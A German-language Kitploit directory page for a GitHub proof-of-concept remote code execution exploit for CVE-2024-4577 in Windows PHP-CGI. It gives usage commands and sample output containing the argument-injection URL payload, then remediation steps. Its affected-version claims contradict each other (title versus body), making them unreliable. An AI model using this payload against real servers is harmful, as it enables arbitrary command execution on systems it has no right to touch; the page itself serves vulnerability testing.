Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4577 — Proof-of-Concept RCE-Exploit für eine kritische Sicherheitslücke in PHP <8.2.15 (Windows), die es Angreifern ermöglicht, beliebige Befehle auszuführen. | Kitploit
Tools/GitHubGitHub/manuelinfosec/cve-2024-4577
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubmanuelinfosec/cve-2024-4577

CVE-2024-4577

Proof-of-Concept RCE-Exploit für eine kritische Sicherheitslücke in PHP <8.2.15 (Windows), die es Angreifern ermöglicht, beliebige Befehle auszuführen.

Repository anzeigen
91vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-4577: Kritische Schwachstelle in PHP-CGI-Konfigurationen

Eine schwerwiegende Sicherheitslücke in PHP’s CGI-Modus ermöglicht es Angreifern, beliebige Befehle durch Manipulation von URL-Parametern auszuführen.

Betroffene Versionen

  • PHP-Versionen vor 7.4.29 und 8.0.19 unter Windows, die php-cgi verwenden.

Angriffsmethodik

  • Angreifer können diese Schwachstelle ausnutzen, indem sie speziell gestaltete Anfragen an das PHP-CGI-Skript senden. Diese Anfragen injizieren bösartige Parameter und ermöglichen so die Ausführung beliebiger Befehle. Dies kann potenziell zu einer vollständigen Systemkompromittierung führen.

Verwendungshinweise

Voraussetzungen

Stellen Sie vor der Ausführung des Skripts sicher, dass Python 3 auf Ihrem System installiert ist. Außerdem benötigen Sie die Bibliothek requests für die Handhabung von HTTP-Anfragen.

Abhängigkeiten installieren

Sie können die erforderlichen Abhängigkeiten mit pip installieren. Falls pip nicht installiert ist, folgen Sie den Anweisungen hier.

  1. Öffnen Sie Ihr Terminal oder die Eingabeaufforderung.
  2. Führen Sie den folgenden Befehl aus, um die Bibliothek requests zu installieren:
root@kitploit:~
pip install requests

Skript ausführen

Um eine Ziel-URL auf die Schwachstelle CVE-2024-4577 zu überprüfen, gehen Sie wie folgt vor:

  • Führen Sie das Skript mit python3 und der Ziel-URL als Argument aus.
root@kitploit:~
python3 exploit.py <target>

Zum Beispiel, um die URL http://example.com zu testen, führen Sie aus:

root@kitploit:~
python3 exploit.py http://example.com

Skriptausgabe

Das Skript testet die angegebene Ziel-URL auf die Schwachstelle und gibt die Ergebnisse in der Konsole aus. Es zeigt an, ob eine potenzielle Schwachstelle gefunden wurde oder nicht.

root@kitploit:~
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include

Abhilfemaßnahmen

  1. Aktualisieren Sie PHP auf die neueste Version.
  2. Stellen Sie sicher, dass Eingabeparameter ordnungsgemäß bereinigt und validiert werden.
  3. Wenden Sie sichere Konfigurationseinstellungen an, um die CGI-Parameterverarbeitung einzuschränken.

Danksagungen

Diese Schwachstelle wurde von Orange Tsai (@orange_8361) entdeckt.

Tool herunterladen